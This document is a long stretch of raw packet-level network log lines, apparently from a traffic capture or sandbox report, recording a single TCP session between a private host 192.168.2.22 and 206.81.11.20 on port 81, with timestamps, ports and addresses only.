Nov 10, 2022 11:43:14.733803034 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733810902 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733834028 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733848095 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733855963 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733879089 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733892918 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733901024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733923912 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733939886 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733944893 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733968019 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.733983040 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.733989954 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734011889 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734026909 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.734036922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734060049 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734074116 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.734081984 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734106064 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734118938 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.734127045 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734150887 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734165907 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.734173059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734198093 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734210968 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.734220028 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734244108 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734256983 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.734265089 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.734302044 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.742105007 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746167898 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746212006 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746244907 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746264935 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746274948 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746308088 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746311903 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746336937 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746365070 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746372938 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746396065 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746424913 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746433973 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746455908 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746485949 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746493101 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746515989 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746545076 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746551037 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746575117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746603012 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746611118 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746632099 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746660948 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746668100 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746689081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746718884 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746731043 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746747971 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746778011 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746784925 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746807098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746834993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746843100 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746864080 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746915102 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.746932030 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746961117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746990919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.746997118 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747020960 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747050047 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747059107 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747078896 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747107029 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747117043 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747136116 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747176886 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747185946 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747206926 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747235060 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747243881 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747262955 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747293949 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747299910 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747323990 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747354031 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747360945 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747385025 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747414112 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747421980 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747446060 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747474909 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747483015 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747504950 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747533083 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747545004 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747562885 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747591972 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747601032 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747621059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747649908 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747658014 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747678995 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747706890 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747718096 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747735023 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747740030 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747764111 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747775078 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747793913 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747823000 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747833014 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747852087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747880936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747890949 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747909069 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747922897 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747937918 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747951031 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.747967958 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.747996092 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748006105 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748024940 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748055935 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748064041 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748086929 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748086929 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748116016 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748126984 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748143911 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748172045 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748188972 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748203039 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748238087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748248100 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748266935 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748269081 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748311996 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748323917 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748342991 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748372078 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748379946 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748400927 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748429060 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748440027 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748457909 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748487949 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748497963 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748517990 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748548031 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748554945 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748575926 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748605013 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748614073 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748635054 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748663902 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748672962 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748693943 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748723030 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748732090 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748752117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748781919 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748789072 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748810053 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748838902 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748846054 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748867989 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748897076 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748904943 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748924971 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748954058 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.748963118 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.748981953 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749011993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749020100 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.749039888 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749068022 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749078035 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.749097109 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749125004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749135017 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.749154091 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749181986 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749193907 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.749211073 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749239922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.749248028 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.749401093 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.772571087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772630930 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772670984 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772707939 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772710085 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.772743940 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772757053 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.772779942 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772814989 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772819042 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.772850990 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772886992 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772888899 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.772922993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772958994 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.772960901 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.772994041 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773030043 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773034096 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773066044 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773103952 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773108006 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773161888 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773205042 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773215055 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773247004 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773287058 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773288965 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773335934 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773375988 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773376942 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773418903 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773458958 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773461103 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773503065 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773542881 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773545027 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773585081 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773626089 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773627043 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773668051 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773709059 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773709059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773752928 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773794889 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773796082 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773837090 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773878098 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773879051 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773920059 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.773961067 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.773961067 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774004936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774043083 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774048090 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774090052 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774133921 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774164915 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774174929 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774219990 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774220943 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774261951 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774307013 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774312019 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774348974 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774390936 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774391890 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774432898 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774477005 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774477005 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774518013 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774552107 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774559021 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774600983 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774616957 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774645090 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774688005 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774689913 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774730921 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774769068 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774772882 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774816036 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774854898 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774856091 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774934053 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.774976969 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.774977922 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775019884 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775062084 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775063992 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775105000 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775144100 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775146008 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775187969 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775228024 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775228977 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775270939 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775315046 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775316000 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775357962 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775367975 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775399923 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775439024 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775440931 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775482893 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775521040 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775525093 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775567055 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775607109 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775608063 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775655985 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775693893 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775696993 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775738001 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775778055 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775778055 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775825024 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775866032 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775866985 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775895119 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775909901 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775949955 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.775952101 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.775993109 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776030064 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776034117 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776074886 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776113987 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776117086 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776158094 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776196957 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776199102 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776231050 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776242018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776283979 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776284933 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776328087 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776370049 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776370049 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776370049 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776411057 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776449919 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776453018 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776494026 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776527882 CET	49173	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:14.776535988 CET	81	49173	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:14.776577950 CET	81	49173	206.81.11.20	192.168.2.22
